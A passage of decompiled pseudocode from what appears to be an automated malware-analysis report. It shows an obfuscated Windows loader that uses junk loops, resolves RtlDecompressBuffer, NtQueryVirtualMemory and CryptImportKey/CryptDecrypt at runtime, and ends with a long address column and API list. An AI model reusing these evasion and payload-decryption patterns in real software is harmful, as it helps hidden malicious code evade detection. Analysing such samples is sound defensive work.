                                                																			_t1028 =  *0x4fef04; // 0x43c14963
                                                																			 *0x4fef04 = E0040489C(_t1028);
                                                																		} while (_v16 < 0xe);
                                                																		goto L185;
                                                																	}
                                                																	_v28 = 0;
                                                																	do {
                                                																		E00407678(_v8, 0, 1,  &_v8);
                                                																		_v28 = _v28 + 1;
                                                																	} while (_v28 != 0xa);
                                                																	goto L183;
                                                																	L185:
                                                																} while (_v12 < 0xf);
                                                																goto L186;
                                                															}
                                                															_v32 = 0;
                                                															_t1635 = _v32 - 0xa;
                                                															if(_v32 < 0xa) {
                                                																_v32 = _v32 + 1;
                                                																_t1191 = E004FEF50; // 0xa3b3f6c0
                                                																 *0x4feecc = _t1191;
                                                																_t1192 =  *0x4feefc; // 0x4b08dcc7
                                                																_push(_t1192);
                                                																_t1429 =  *0x4feee8; // 0xdcd0f434
                                                																_t1506 =  *0x4feef0; // 0x44632301
                                                																_t1193 =  *0x4fef4c; // 0x43c1493c
                                                																 *0x4feee8 = E004EE798(_t1193, _t1395, _t1429, _t1506, _t1635);
                                                															}
                                                															_t1035 =  *0x4fef28; // 0x3c79b5d4
                                                															 *0x4feef0 = _t1035;
                                                															_t1036 =  *0x4feecc; // 0xd26bafe0
                                                															_t1636 = _t1036 -  *0x4feef0; // 0x44632301
                                                															if(_t1636 > 0) {
                                                																_v20 = _v16;
                                                																_t1187 =  *0x4fef18; // 0xbc3e19a
                                                																E004FEF2C = _t1187 - E004FEF20;
                                                																_t1189 = E004FEF00; // 0xa3b3f6c0
                                                																 *0x4fef44 = _t1189 + 4;
                                                															}
                                                															_t1037 =  *0x4fef30; // 0xa1d816
                                                															 *0x4feea0 = _t1037;
                                                															_t1038 =  *0x4fef14; // 0xb52124ca
                                                															 *0x4feecc = _t1038;
                                                															 *0x4feee0 = 0x99 - E004FEF2C;
                                                															E004FEF00 = E004FEF2C * 0xfe;
                                                															 *0x505914 = GetProcAddress(_v36, "RtlAllocateHeap");
                                                															_v28 = 0;
                                                															if(_v28 >= 4) {
                                                																L154:
                                                																E004FEF34 =  *0x4feef4 * 0x23;
                                                																_t1046 =  *0x4feedc; // 0xbc3e19a
                                                																 *0x4fef4c = _t1046 + 0xed;
                                                																_t1048 =  *0x4feef0; // 0x44632301
                                                																 *0x4feed8 = _t1048 + 4;
                                                																_t1050 =  *0x4fef4c; // 0x43c1493c
                                                																 *0x4feee0 = _t1050;
                                                																_t1051 = E004FEF38; // 0xc3c34fdc
                                                																 *0x4feee0 = _t1051;
                                                																_t1052 =  *0x4feee0; // 0x747938b
                                                																_t1641 = _t1052 -  *0x4feee0; // 0x747938b
                                                																if(_t1641 <= 0) {
                                                																	_t1053 =  *0x4feee8; // 0xdcd0f434
                                                																	_t1054 = _t1053 *  *0x4feefc;
                                                																	__eflags = _t1054;
                                                																	E004FEF2C = _t1054;
                                                																} else {
                                                																	 *0x4fef04 = 0xe9 - E004FEF20;
                                                																}
                                                																_push(_v28);
                                                																_t1417 = E004FEF20; // 0x6e687a1a
                                                																_t1056 =  *0x4fef30; // 0xa1d816
                                                																 *0x4fef3c = E004EE798(_t1056, _t1395, _t1417, _v28, _t1641);
                                                																 *0x505918 = GetProcAddress(_v36, "RtlDecompressBuffer");
                                                																 *0x505944 = GetProcAddress(_v36, "NtQueryVirtualMemory");
                                                																_v20 = _v28 - 0x77;
                                                																_v24 = _v32 - _v12;
                                                																_t1066 = E004FEF20; // 0x6e687a1a
                                                																 *0x4fef30 = _t1066;
                                                																_t1067 =  *0x4fef04; // 0x43c14963
                                                																E004FEF34 = _t1067;
                                                																_t1068 = E004FEF20; // 0x6e687a1a
                                                																 *0x4fef48 = _t1068 + 4;
                                                																 *0x505958 = GetProcAddress(_v36, "RtlGetLastWin32Error");
                                                																asm("fild dword [ebp-0x14]");
                                                																_v16 = E004048D8();
                                                																_v20 = _v32 * 0xdf;
                                                																_t1074 =  *0x4feee0; // 0x747938b
                                                																 *0x4fef14 = (_t1074 << 5) + (_t1074 << 5) * 4;
                                                																_t1077 = E004FEF20; // 0x6e687a1a
                                                																E004FEF20 = E0040489C(_t1077);
                                                																_t1079 = E004FEF10; // 0x1cb931c0
                                                																 *0x4fef28 = _t1079;
                                                																_t1080 =  *0x4fef28; // 0x3c79b5d4
                                                																_t1642 = _t1080 - E004FEF20; // 0x6e687a1a
                                                																if(_t1642 < 0) {
                                                																	_t1171 =  *0x4fef3c; // 0x1cb932a9
                                                																	E004FEF38 = _t1171;
                                                																	_t1172 = E004FEF38; // 0xc3c34fdc
                                                																	_t1643 = _t1172 - E004FEF20; // 0x6e687a1a
                                                																	if(_t1643 >= 0) {
                                                																		_t1173 =  *0x4feecc; // 0xd26bafe0
                                                																		_push(_t1173);
                                                																		_t1427 =  *0x4feeec; // 0xb52124f2
                                                																		_t1174 =  *0x4feefc; // 0x4b08dcc7
                                                																		 *0x4feee8 = E004EE798(_t1174, _t1395, _t1427, _v24, __eflags);
                                                																	} else {
                                                																		_t1176 =  *0x4fef28; // 0x3c79b5d4
                                                																		E004FEF50 = _t1176 +  *0x4fef28;
                                                																	}
                                                																}
                                                																_t1081 = E004FEF00; // 0xa3b3f6c0
                                                																E004FEF00 = E0040489C(_t1081);
                                                																 *0x4fef18 = 0xc8 -  *0x4fef18;
                                                																 *0x50595c = GetProcAddress(_v36, "RtlSetLastWin32Error");
                                                																_t1087 = E004FEF2C; // 0xa1d900
                                                																E004FEED0 = _t1087;
                                                																_v12 = 0;
                                                																do {
                                                																	_v24 = _v20 - _v28;
                                                																	_push(_v12);
                                                																	_t1492 = E004FEF50; // 0xa3b3f6c0
                                                																	 *0x4fef18 = E004EE798(_v24, _t1395, _v16, _t1492, 0);
                                                																	 *0x4fef28 = E004FEF38 * 0x57;
                                                																	_v12 = _v12 + 1;
                                                																	_t1645 = _v12 - 8;
                                                																} while (_v12 != 8);
                                                																_t1095 =  *0x4feea0; // 0xa1d900
                                                																_push(_t1095);
                                                																_t1493 =  *0x4fef14; // 0xb52124ca
                                                																E004FEF34 = E004EE798(_v24, _t1395, _v28, _t1493, _t1645);
                                                																asm("fild dword [0x4feecc]");
                                                																 *0x4fef4c = E004048CC();
                                                																_t1099 =  *0x4feee8; // 0xdcd0f434
                                                																E004FEED0 = _t1099 +  *0x4fef14;
                                                																_t1101 =  *0x4feee0; // 0x747938b
                                                																 *0x4feef0 = _t1101;
                                                																_t1102 = LoadLibraryW(L"shell32.dll"); // executed
                                                																_v36 = _t1102;
                                                																_v28 = _v32 - _v12;
                                                																_v24 = 0;
                                                																_push(_v32);
                                                																_t1107 =  *0x4feef0; // 0x44632301
                                                																E004EE798(_t1107, _t1395, _v28, _v32, _t1645);
                                                																_t1109 = E004FEF50; // 0xa3b3f6c0
                                                																E004FEF50 = E0040489C(_t1109);
                                                																_t1111 =  *0x4feeec; // 0xb52124f2
                                                																 *0x4feea0 = _t1111;
                                                																_t1112 =  *0x4feea0; // 0xa1d900
                                                																_t1646 = _t1112 - E004FEF50; // 0xa3b3f6c0
                                                																if(_t1646 > 0) {
                                                																	_t1168 =  *0x4fef48; // 0xc3c34ef0
                                                																	_push(_t1168);
                                                																	_t1502 =  *0x4fef4c; // 0x43c1493c
                                                																	_t1169 =  *0x4feefc; // 0x4b08dcc7
                                                																	 *0x4fef18 = E004EE798(_t1169, _t1395, _v28, _t1502, _t1646);
                                                																}
                                                																_t1113 =  *0x4feee8; // 0xdcd0f434
                                                																 *0x4fef18 =  *0x4fef18 + _t1113;
                                                																E00406CF4( &_v8, L"wdscore.dll");
                                                																_t1116 =  *0x4fef14; // 0xb52124ca
                                                																 *0x4fef30 = _t1116;
                                                																_t1117 = E004FEF34; // 0xc3c34ef0
                                                																if(_t1117 -  *0x4feef0 < 0xe2) {
                                                																	_t1166 =  *0x4feedc; // 0xbc3e19a
                                                																	 *0x4fef4c = _t1166 + 0xd8;
                                                																}
                                                																if(_v36 == 0) {
                                                																	goto L179;
                                                																} else {
                                                																	_t1119 = E004FEED0; // 0xc3c34ef0
                                                																	E004FEF10 = _t1119;
                                                																	_v24 = _v32 + 0x6c;
                                                																	_v20 = _v28;
                                                																	_t1123 =  *0x4feee8; // 0xdcd0f434
                                                																	 *0x4fef40 = _t1123 - 0x68;
                                                																	if(E00407774(L"NlsLexicons081a.dll", 1, _v8) != 0x2d) {
                                                																		E00406CF4( &_v8, _v8);
                                                																	}
                                                																	 *0x505960 = GetProcAddress(_v36, "SHGetSpecialFolderLocation");
                                                																	_v24 = _v16 + 4;
                                                																	_t1131 =  *0x4feed8; // 0x1cb9338e
                                                																	 *0x4fef3c = _t1131 +  *0x4fef40;
                                                																	_t1133 = E004FEED0; // 0xc3c34ef0
                                                																	_v60 = _t1133 + 4;
                                                																	asm("fild dword [ebp-0x38]");
                                                																	E004FEF50 = E004048D8();
                                                																	_t1651 = _v12 - _v28;
                                                																	if(_v12 > _v28) {
                                                																		_push(_v16);
                                                																		E004FEF00 = E004EE798(_v20, _t1395, _v16, _v28, _t1651);
                                                																		_push(_v32);
                                                																		_t1500 =  *0x4feee8; // 0xdcd0f434
                                                																		_t1162 =  *0x4feea0; // 0xa1d900
                                                																		 *0x4fef28 = E004EE798(_t1162, _t1395, _v12, _t1500, _t1651);
                                                																	}
                                                																	_push(_v12);
                                                																	_t1138 =  *0x4feefc; // 0x4b08dcc7
                                                																	E004EE798(_t1138, _t1395, _v12, _v16, _t1651);
                                                																	 *0x505964 = GetProcAddress(_v36, "SHGetPathFromIDListW");
                                                																	_v32 = 0;
                                                																	do {
                                                																		_v32 = _v32 + 1;
                                                																	} while (_v32 != 0x10);
                                                																	_v20 = 0;
                                                																	_t1654 = _v20 - 9;
                                                																	if(_v20 >= 9) {
                                                																		L178:
                                                																		asm("fild dword [0x4fef38]");
                                                																		 *0x4fef28 = E004048CC();
                                                																		_t1145 =  *0x4fef4c; // 0x43c1493c
                                                																		E004FEF38 = _t1145 << 6;
                                                																		_t1147 = E004FEF34; // 0xc3c34ef0
                                                																		 *0x4feea0 = _t1147 + 0xa;
                                                																		goto L179;
                                                																	} else {
                                                																		goto L175;
                                                																	}
                                                																	do {
                                                																		L175:
                                                																		_v20 = _v20 + 1;
                                                																		E004FEF2C = 0x4b -  *0x4fef44;
                                                																		_push(_v20);
                                                																		_t1152 =  *0x4feeec; // 0xb52124f2
                                                																		E004EE798(_t1152, _t1395, _v20, _v28, _t1654);
                                                																		_v28 = 0;
                                                																		if(_v28 >= 2) {
                                                																			goto L177;
                                                																		} else {
                                                																			goto L176;
                                                																		}
                                                																		do {
                                                																			L176:
                                                																			_v28 = _v28 + 1;
                                                																			_t1157 = E004FEF2C; // 0xa1d900
                                                																			E004FEED0 = _t1157;
                                                																		} while (_v28 < 2);
                                                																		L177:
                                                																		_t1155 =  *0x4feef4; // 0xb52124ca
                                                																		 *0x4feefc = _t1155 + E004FEF10;
                                                																	} while (_v20 < 9);
                                                																	goto L178;
                                                																}
                                                															} else {
                                                																do {
                                                																	_t429 =  &_v28;
                                                																	 *_t429 = _v28 + 1;
                                                																	_t1639 =  *_t429;
                                                																	_t1180 =  *0x4fef24; // 0x0
                                                																	E00407640(_t1180, L"WMPhoto.dll");
                                                																	if( *_t429 != 0) {
                                                																		asm("fild dword [ebp-0x14]");
                                                																		_v16 = E004048D8();
                                                																	} else {
                                                																		_push(_v32);
                                                																		_t1505 = E004FEF20; // 0x6e687a1a
                                                																		_t1184 = E004FEF38; // 0xc3c34fdc
                                                																		E004FEF34 = E004EE798(_t1184, _t1395, _v12, _t1505, _t1639);
                                                																	}
                                                																} while (_v28 < 4);
                                                																goto L154;
                                                															}
                                                														} else {
                                                															do {
                                                																_v12 = _v12 + 1;
                                                																_t1195 =  *0x4fef3c; // 0x1cb932a9
                                                																E004FEF38 = _t1195 * E004FEED0;
                                                																_t1633 = _v12 - 0xa;
                                                															} while (_v12 < 0xa);
                                                															goto L144;
                                                														}
                                                													} else {
                                                														do {
                                                															_v28 = _v28 + 1;
                                                															_v12 = 0;
                                                															if(_v12 < 0) {
                                                																_v12 = _v12 + 1;
                                                																E00406CF4( &_v8, L"cfgbkend.dll");
                                                															}
                                                															_v16 = 0;
                                                															if(_v16 < 1) {
                                                																do {
                                                																	_v16 = _v16 + 1;
                                                																	asm("fild dword [0x4fef00]");
                                                																	E004FEF10 = E004048CC();
                                                																} while (_v16 < 1);
                                                															}
                                                															_t1221 =  *0x4fef14; // 0xb52124ca
                                                															E004FEF2C = _t1221;
                                                															_t1621 = _v28 - 0xd;
                                                														} while (_v28 < 0xd);
                                                														goto L122;
                                                													}
                                                												}
                                                												_v28 = 0;
                                                												if(_v28 >= 0) {
                                                													L79:
                                                													_t1275 =  *0x4feea0; // 0xa1d900
                                                													 *0x4feef0 = _t1275 + 0x9b;
                                                													_t1277 = E004FEF2C; // 0xa1d900
                                                													 *0x4feefc = _t1277;
                                                													_t1278 =  *0x4fef28; // 0x3c79b5d4
                                                													 *0x4fef14 = _t1278 -  *0x4fef28;
                                                													goto L83;
                                                												} else {
                                                													goto L73;
                                                												}
                                                												do {
                                                													L73:
                                                													_v28 = _v28 + 1;
                                                													_v48 = _v8;
                                                													if(_v48 != 0) {
                                                														_v48 =  *((intOrPtr*)(_v48 - 4));
                                                													}
                                                													if(_v48 != 0xb1) {
                                                														_t1281 = E004FEF38 * 0xd5;
                                                														__eflags = _t1281;
                                                														E004FEF20 = _t1281;
                                                													} else {
                                                														E00407678(_v8, 0, 1,  &_v8);
                                                														E00406CF4( &_v8, _v8);
                                                														_v16 = _v24 * _v20;
                                                													}
                                                													E00407678(_v8, 0, 1,  &_v8);
                                                													_t1285 =  *0x4fef14; // 0xb52124ca
                                                													 *0x4feea0 = _t1285 + 4;
                                                												} while (_v28 < 0);
                                                												goto L79;
                                                											} else {
                                                												do {
                                                													_v32 = _v32 + 1;
                                                													_t1298 = E00407774(L"GetLocalManagedApplicationData", 1, _v8);
                                                													_t1591 = _t1298 - 0x4f;
                                                													if(_t1298 >= 0x4f) {
                                                														_t1300 = _v12 - _v16;
                                                														__eflags = _t1300;
                                                														_v20 = _t1300;
                                                													} else {
                                                														_t1302 =  *0x4fef40; // 0x3c79b5d4
                                                														_push(_t1302);
                                                														_t1440 =  *0x4fef18; // 0xbc3e19a
                                                														_t1303 =  *0x4feef4; // 0xb52124ca
                                                														 *0x4fef30 = E004EE798(_t1303, _t1395, _t1440, _v12, _t1591);
                                                													}
                                                													asm("fild dword [0x4feedc]");
                                                													E004FEF2C = E004048CC();
                                                													_t1592 = _v32 - 0xc;
                                                												} while (_v32 < 0xc);
                                                												goto L71;
                                                											}
                                                										}
                                                									} else {
                                                										goto L56;
                                                									}
                                                									do {
                                                										L56:
                                                										_v32 = _v32 + 1;
                                                										E00407678(_v8, 0, 1,  &_v8);
                                                									} while (_v32 < 4);
                                                								}
                                                								goto L59;
                                                							} else {
                                                								do {
                                                									_v32 = _v32 + 1;
                                                									_v40 = _v8;
                                                									if(_v40 != 0) {
                                                										_v40 =  *((intOrPtr*)(_v40 - 4));
                                                									}
                                                									if(_v40 > 0x52) {
                                                										_t1346 =  *0x4fef28; // 0x3c79b5d4
                                                										E004FEED0 = _t1346;
                                                									}
                                                									_t1341 =  *0x4fef4c; // 0x43c1493c
                                                									 *0x4feee0 = _t1341;
                                                									_v16 = 0;
                                                									if(_v16 < 9) {
                                                										do {
                                                											_v16 = _v16 + 1;
                                                											_v20 = _v24 * 0xe4;
                                                										} while (_v16 < 9);
                                                									}
                                                									_t1343 =  *0x4feecc; // 0xd26bafe0
                                                									E004FEF34 = _t1343 + 0x98;
                                                								} while (_v32 < 0xd);
                                                								goto L36;
                                                							}
                                                						}
                                                					}
                                                					_t1371 =  *0x4feea0; // 0xa1d900
                                                					 *0x4fef04 = _t1371;
                                                					_t1372 =  *0x4fef40; // 0x3c79b5d4
                                                					E004FEF0C = _t1372;
                                                					_t1373 = E004FEF50; // 0xa3b3f6c0
                                                					_v60 = _t1373 + 4;
                                                					asm("fild dword [ebp-0x38]");
                                                					 *0x4fef28 = E004048D8();
                                                					_t1376 =  *0x4fef30; // 0xa1d816
                                                					 *0x4fef30 = E0040489C(_t1376);
                                                					_t1378 =  *0x4fef30; // 0xa1d816
                                                					_t1549 = _t1378 - E004FEF0C; // 0xb52124bf
                                                					if(_t1549 >= 0) {
                                                						goto L10;
                                                					}
                                                					_v12 = 0;
                                                					if(_v12 >= 4) {
                                                						goto L10;
                                                					} else {
                                                						goto L9;
                                                					}
                                                					do {
                                                						L9:
                                                						_v12 = _v12 + 1;
                                                						_t1380 =  *0x4fef4c; // 0x43c1493c
                                                						 *0x4feea0 = _t1380;
                                                					} while (_v12 < 4);
                                                					goto L10;
                                                				} else {
                                                					goto L1;
                                                				}
                                                				do {
                                                					L1:
                                                					_v32 = _v32 + 1;
                                                					_t1535 =  *0x4fef24; // 0x0
                                                					if(E00407774(L"tssysprep.dll", 1, _t1535) != 0xcc) {
                                                						_v12 = _v24 + 0xa3;
                                                					}
                                                					_t1387 = E004FEF38; // 0xc3c34fdc
                                                					 *0x4feef0 = _t1387;
                                                					_t1388 = E004FEF34; // 0xc3c34ef0
                                                					E004FEF0C = _t1388 + 0x35;
                                                					_t1390 = E004FEF34; // 0xc3c34ef0
                                                					E004FEF2C = _t1390 +  *0x4fef3c;
                                                					asm("fild dword [0x4fef44]");
                                                					 *0x4fef3c = E004048CC();
                                                				} while (_v32 < 2);
                                                				goto L4;
                                                			}

                                                0x004eebd5
                                                0x004eebdc
                                                0x004eebe3
                                                0x004eebe5
                                                0x004eebe8
                                                0x004eebed
                                                0x004eebf2
                                                0x004eebf7
                                                0x004eebfc
                                                0x004eec01
                                                0x004eec07
                                                0x004eec14
                                                0x004eec1f
                                                0x004eec09
                                                0x004eec0f
                                                0x004eec0f
                                                0x004eec07
                                                0x004eec2c
                                                0x004eec37
                                                0x004eec3c
                                                0x004eec46
                                                0x004eec49
                                                0x004eec51
                                                0x004eec56
                                                0x004eec61
                                                0x004eec66
                                                0x004eec71
                                                0x004eec77
                                                0x004eec79
                                                0x004eec83
                                                0x004eec83
                                                0x004eec88
                                                0x004eec8d
                                                0x004eeca0
                                                0x004eeca7
                                                0x004eecaa
                                                0x004eecaa
                                                0x004eecaf
                                                0x004eecb4
                                                0x004eecb7
                                                0x004eecbd
                                                0x004eecc2
                                                0x004eecc7
                                                0x004eecd1
                                                0x004eecd6
                                                0x004eecdb
                                                0x004eece1
                                                0x004eecea
                                                0x004eecf5
                                                0x004eecf5
                                                0x004eed0a
                                                0x004eed0c
                                                0x004eed17
                                                0x004eed1c
                                                0x004eed27
                                                0x004eed2d
                                                0x004eed2f
                                                0x004eed37
                                                0x004eed37
                                                0x004eed3c
                                                0x004eed41
                                                0x004eed41
                                                0x004eed47
                                                0x004eed47
                                                0x004eed4c
                                                0x004eed51
                                                0x004eed59
                                                0x004eed5a
                                                0x004eed60
                                                0x004eed6e
                                                0x004eed81
                                                0x004eed88
                                                0x004eed8f
                                                0x004eedf8
                                                0x004eedf8
                                                0x004eedfd
                                                0x004eee02
                                                0x004eee0d
                                                0x004eee12
                                                0x004eee17
                                                0x004eee1c
                                                0x004eee21
                                                0x004eee28
                                                0x004eee32
                                                0x004eee32
                                                0x004eee3c
                                                0x004eee48
                                                0x004eee48
                                                0x004eee4d
                                                0x004eee58
                                                0x004eee5e
                                                0x004eee6f
                                                0x004eee7a
                                                0x004eee80
                                                0x004eee9f
                                                0x004eeea3
                                                0x004eeeac
                                                0x004eee82
                                                0x004eee82
                                                0x004eee8a
                                                0x004eee8d
                                                0x004eee95
                                                0x004eee95
                                                0x004eee60
                                                0x004eee60
                                                0x004eee68
                                                0x004eee68
                                                0x004eeebf
                                                0x004eeed2
                                                0x004eeed7
                                                0x004eeee1
                                                0x004eeee6
                                                0x004eeeeb
                                                0x004eeef0
                                                0x004eeef5
                                                0x004eeefb
                                                0x004eeefd
                                                0x004eef02
                                                0x004eef07
                                                0x004eef11
                                                0x004eef1c
                                                0x004eef25
                                                0x004eef25
                                                0x004eef36
                                                0x004eef38
                                                0x004eef43
                                                0x004eef43
                                                0x004eef48
                                                0x004eef52
                                                0x004eef57
                                                0x004eef5c
                                                0x004eef62
                                                0x004eef94
                                                0x004eef99
                                                0x004eef9e
                                                0x004eefa8
                                                0x004eefad
                                                0x004eefb2
                                                0x004eefb2
                                                0x004eefb7
                                                0x004eef64
                                                0x004eef6c
                                                0x004eef71
                                                0x004eef82
                                                0x004eef8d
                                                0x004eef73
                                                0x004eef7b
                                                0x004eef7b
                                                0x004eef71
                                                0x004eefbc
                                                0x004eefc4
                                                0x004eefc9
                                                0x004eefd1
                                                0x004eefe4
                                                0x004eefe9
                                                0x004eeff4
                                                0x004eeffa
                                                0x004ef025
                                                0x004ef025
                                                0x004ef02c
                                                0x004eeffc
                                                0x004eeffe
                                                0x004ef005
                                                0x004ef02f
                                                0x004ef02f
                                                0x004ef037
                                                0x004ef03a
                                                0x004ef042
                                                0x004ef047
                                                0x004ef04c
                                                0x004ef05f
                                                0x004ef064
                                                0x004ef06f
                                                0x004ef07d
                                                0x004ef07f
                                                0x004ef084
                                                0x004ef084
                                                0x004ef089
                                                0x004ef089
                                                0x004ef09c
                                                0x004ef0a7
                                                0x004ef0b0
                                                0x004ef0b3
                                                0x004ef0bb
                                                0x004ef0c0
                                                0x004ef0c8
                                                0x004ef0cd
                                                0x004ef0d2
                                                0x004ef0e1
                                                0x004ef0e6
                                                0x004ef0eb
                                                0x004ef0fe
                                                0x004ef10b
                                                0x004ef114
                                                0x004ef117
                                                0x004ef121
                                                0x004ef126
                                                0x004ef131
                                                0x004ef136
                                                0x004ef141
                                                0x004ef146
                                                0x004ef151
                                                0x004ef164
                                                0x004ef173
                                                0x004ef17c
                                                0x004ef185
                                                0x004ef188
                                                0x004ef193
                                                0x004ef198
                                                0x004ef1a3
                                                0x004ef1a8
                                                0x004ef1ad
                                                0x004ef1b2
                                                0x004ef1ba
                                                0x004ef1c0
                                                0x004ef1ca
                                                0x004ef1ca
                                                0x004ef1d3
                                                0x004f059c
                                                0x004f05a2
                                                0x004f05a5
                                                0x004f05ad
                                                0x004f05b0
                                                0x004f05b8
                                                0x004f05bd
                                                0x004f05c2
                                                0x004f05c7
                                                0x004f05cc
                                                0x004f05d1
                                                0x004f05d6
                                                0x004f05dc
                                                0x004f05e9
                                                0x004f05e9
                                                0x004f05ee
                                                0x004f05f9
                                                0x00000000
                                                0x004ef1d9
                                                0x004ef1dc
                                                0x004ef1df
                                                0x004ef1e4
                                                0x004ef1e9
                                                0x004ef1f3
                                                0x004ef1f6
                                                0x004ef1fe
                                                0x004ef203
                                                0x004ef20e
                                                0x004ef21a
                                                0x004ef21c
                                                0x004ef221
                                                0x004ef228
                                                0x004ef232
                                                0x004ef232
                                                0x004ef237
                                                0x004ef241
                                                0x004ef246
                                                0x004ef24e
                                                0x004ef251
                                                0x004ef259
                                                0x004ef26c
                                                0x004ef273
                                                0x004ef27a
                                                0x004ef2d5
                                                0x004ef2d5
                                                0x004ef2da
                                                0x004ef2db
                                                0x004ef2e1
                                                0x004ef2e7
                                                0x004ef2f1
                                                0x004ef2f6
                                                0x004ef2fb
                                                0x004ef300
                                                0x004ef305
                                                0x004ef30a
                                                0x004ef312
                                                0x004ef317
                                                0x004ef31c
                                                0x004ef320
                                                0x004ef326
                                                0x004ef330
                                                0x004ef343
                                                0x004ef356
                                                0x004ef35b
                                                0x004ef366
                                                0x004ef374
                                                0x004ef439
                                                0x004ef444
                                                0x004ef44a
                                                0x004ef44c
                                                0x004ef451
                                                0x004ef451
                                                0x004ef457
                                                0x004ef457
                                                0x004ef45c
                                                0x004ef461
                                                0x004ef466
                                                0x004ef466
                                                0x004ef470
                                                0x004ef475
                                                0x004ef47f
                                                0x004ef484
                                                0x004ef484
                                                0x004ef489
                                                0x004ef490
                                                0x004ef49a
                                                0x004ef49a
                                                0x004ef4a1
                                                0x004ef4a3
                                                0x004ef4a8
                                                0x004ef4ad
                                                0x004ef4b2
                                                0x004ef4b7
                                                0x004ef4bc
                                                0x004ef4c1
                                                0x004ef4c6
                                                0x004ef4cc
                                                0x004ef4ce
                                                0x004ef4d9
                                                0x004ef4d9
                                                0x004ef4de
                                                0x004ef4e8
                                                0x004ef4eb
                                                0x004ef4f3
                                                0x004ef4f3
                                                0x004ef4f8
                                                0x004ef4fd
                                                0x004ef503
                                                0x004ef508
                                                0x004ef50d
                                                0x004ef512
                                                0x004ef518
                                                0x004ef529
                                                0x004ef534
                                                0x004ef51a
                                                0x004ef51a
                                                0x004ef522
                                                0x004ef522
                                                0x004ef539
                                                0x004ef544
                                                0x004ef554
                                                0x004ef567
                                                0x004ef56c
                                                0x004ef576
                                                0x004ef57b
                                                0x004ef580
                                                0x004ef585
                                                0x004ef58a
                                                0x004ef590
                                                0x004ef5f2
                                                0x004ef5f7
                                                0x004ef5f9
                                                0x004ef5fe
                                                0x004ef601
                                                0x004ef605
                                                0x004ef60a
                                                0x004ef60a
                                                0x004ef60f
                                                0x004ef60f
                                                0x004ef612
                                                0x004ef616
                                                0x004ef61b
                                                0x004ef61c
                                                0x004ef622
                                                0x004ef628
                                                0x004ef632
                                                0x004ef632
                                                0x004ef616
                                                0x004ef592
                                                0x004ef595
                                                0x004ef59f
                                                0x004ef5a4
                                                0x004ef5a9
                                                0x004ef5b0
                                                0x004ef5b5
                                                0x004ef5c2
                                                0x004ef5c5
                                                0x004ef5d0
                                                0x004ef5d5
                                                0x004ef5e0
                                                0x004ef5e0
                                                0x004ef637
                                                0x004ef642
                                                0x004ef64f
                                                0x004ef654
                                                0x004ef659
                                                0x004ef65e
                                                0x004ef669
                                                0x004ef66e
                                                0x004ef673
                                                0x004ef686
                                                0x004ef691
                                                0x004ef694
                                                0x004ef69f
                                                0x004ef6a5
                                                0x004ef6b1
                                                0x004ef6b1
                                                0x004ef6b6
                                                0x004ef6c0
                                                0x004ef6cc
                                                0x004ef6d1
                                                0x004ef6dc
                                                0x004ef6ef
                                                0x004ef702
                                                0x004ef715
                                                0x004ef728
                                                0x004ef735
                                                0x004ef73c
                                                0x004ef73f
                                                0x004ef745
                                                0x004ef748
                                                0x004ef74b
                                                0x004ef751
                                                0x004ef75b
                                                0x004ef761
                                                0x004ef778
                                                0x004ef77b
                                                0x004ef78b
                                                0x004ef795
                                                0x004ef77d
                                                0x004ef784
                                                0x004ef784
                                                0x004ef763
                                                0x004ef763
                                                0x004ef76b
                                                0x004ef76b
                                                0x004ef79a
                                                0x004ef7a5
                                                0x004ef7aa
                                                0x004ef7af
                                                0x004ef7c2
                                                0x004ef7c9
                                                0x004ef7cc
                                                0x004ef7d0
                                                0x004ef7d2
                                                0x004ef7e3
                                                0x004ef7e8
                                                0x004ef7f0
                                                0x004ef7f0
                                                0x004ef7fb
                                                0x004ef803
                                                0x004ef816
                                                0x004ef81b
                                                0x004ef823
                                                0x004ef826
                                                0x004ef82e
                                                0x004ef833
                                                0x004ef83e
                                                0x004ef843
                                                0x004ef84e
                                                0x004ef861
                                                0x004ef86c
                                                0x004ef876
                                                0x004ef879
                                                0x004ef881
                                                0x004ef88d
                                                0x004ef895
                                                0x004ef896
                                                0x004ef89c
                                                0x004ef8aa
                                                0x004ef8af
                                                0x004ef8b4
                                                0x004ef8c7
                                                0x004ef8da
                                                0x004ef8e7
                                                0x004ef8ee
                                                0x004ef8f1
                                                0x004ef8f7
                                                0x004ef8fa
                                                0x004ef902
                                                0x004ef905
                                                0x004ef908
                                                0x004ef90e
                                                0x004ef913
                                                0x004ef91a
                                                0x004ef921
                                                0x004ef923
                                                0x004eedb6
                                                0x004eedbb
                                                0x004eedc0
                                                0x004eedc7
                                                0x004eedce
                                                0x004eedd0
                                                0x004eedd0
                                                0x004eedda
                                                0x004eeddd
                                                0x004eedd0
                                                0x004eede3
                                                0x004eeded
                                                0x004eedf2
                                                0x00000000
                                                0x004eed91
                                                0x004eed8f
                                                0x004eeb44
                                                0x004eea9a
                                                0x004eea9f
                                                0x004eeaa4
                                                0x004eeaa9
                                                0x004eeaae
                                                0x004eeab6
                                                0x004eeab9
                                                0x004eeac1
                                                0x004eeac6
                                                0x004eead0
                                                0x004eead5
                                                0x004eeada
                                                0x004eeae0
                                                0x00000000
                                                0x00000000
                                                0x004eeae4
                                                0x004eeaeb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004eeaed
                                                0x004eeaed
                                                0x004eeaed
                                                0x004eeaf0
                                                0x004eeaf5
                                                0x004eeafa
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004ee9a1
                                                0x004ee9a1
                                                0x004ee9a1
                                                0x004ee9a9
                                                0x004ee9be
                                                0x004ee9c8
                                                0x004ee9c8
                                                0x004ee9cb
                                                0x004ee9d0
                                                0x004ee9d5
                                                0x004ee9dd
                                                0x004ee9e2
                                                0x004ee9ed
                                                0x004ee9f2
                                                0x004ee9fd
                                                0x004eea02
                                                0x00000000

                                                APIs
                                                • GetModuleHandleW.KERNEL32(advapi32.dll,004FC554,00000000,004F065B,?,00000000,004F07FA), ref: 004EEA7E
                                                • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004EEB53
                                                • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 004EEBD0
                                                • GetProcAddress.KERNEL32(00000000,CryptDestroyKey), ref: 004EEC9B
                                                • GetProcAddress.KERNEL32(00000000,CryptImportKey), ref: 004EED7C
                                                • GetProcAddress.KERNEL32(00000000,CryptDecrypt), ref: 004EEEBA
                                                • GetProcAddress.KERNEL32(00000000,CryptCreateHash), ref: 004EEECD
                                                • GetProcAddress.KERNEL32(00000000,CryptHashData), ref: 004EEFDF
